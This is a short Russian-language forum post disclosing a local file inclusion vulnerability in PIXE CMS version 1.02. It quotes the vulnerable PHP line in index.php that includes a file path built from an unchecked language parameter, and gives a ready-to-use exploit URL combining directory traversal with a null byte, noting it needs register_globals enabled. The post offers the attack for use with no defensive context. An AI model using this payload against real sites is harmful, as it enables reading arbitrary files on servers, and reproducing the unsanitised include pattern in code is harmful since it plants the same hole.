20.11.2009, 01:22
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
PIXE CMS VERSION 1.02
Ну вот наконец то вырвался я из бана 
Уязвимость присутствует в скрипте index.php (и не только):
Уязвимый код:
PHP код:
...
include "admin/lang/".$language.".php";
...
Эксплатация:
Код:
http://localhost/22/index.php?language=../../../../FILE%00
Для эксплатации понадобится register_globals = ON
|
|
|